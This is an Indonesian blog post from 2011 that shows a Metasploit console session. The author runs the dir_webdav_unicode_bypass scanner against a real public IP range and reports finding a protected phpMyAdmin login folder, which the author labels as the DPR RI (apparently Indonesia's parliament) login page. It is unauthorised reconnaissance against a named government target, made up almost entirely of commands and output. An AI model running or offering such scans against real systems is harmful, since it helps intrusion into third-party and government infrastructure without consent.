mencari halaman login via [metasploit]
msf > use auxiliary/scanner/http/dir_webdav_unicode_bypass
msf auxiliary(dir_webdav_unicode_bypass) > show options
Module options (auxiliary/scanner/http/dir_webdav_unicode_bypass)
:
Name Current Setting Required Description
---- --------------- -------- -----------
DICTIONARY /opt/framework3/msf3/data/wmap/wmap_dirs.txt no Path of word dictionary to use
ERROR_CODE 404 yes Error code for non existent directory
HTTP404S /opt/framework3/msf3/data/wmap/wmap_404s.txt no Path of 404 signatures to use
PATH / yes The path to identify files
Proxies no Use a proxy chain
RHOSTS yes The target address range or CIDR identifier
RPORT 80 yes The target port
THREADS 1 yes The number of concurrent threads
VHOST no HTTP server virtual host
msf auxiliary(dir_webdav_unicode_bypass) > set RHOSTS 202.182.170.10-254
RHOSTS => 202.182.170.10-254
msf auxiliary(dir_webdav_unicode_bypass) > set THREADS 20
THREADS => 20
msf auxiliary(dir_webdav_unicode_bypass) > run
[*] Using code '404' as not found.
[*] Using code '403' as not found.
[*] Using code '404' as not found.
[*] Found protected folder http://202.182.170.26:80/PMA/ 401 (202.182.170.26) <=halaman login dprri
Jumat, 02 September 2011
Langganan:
Posting Komentar (Atom)
0 komentar:
Posting Komentar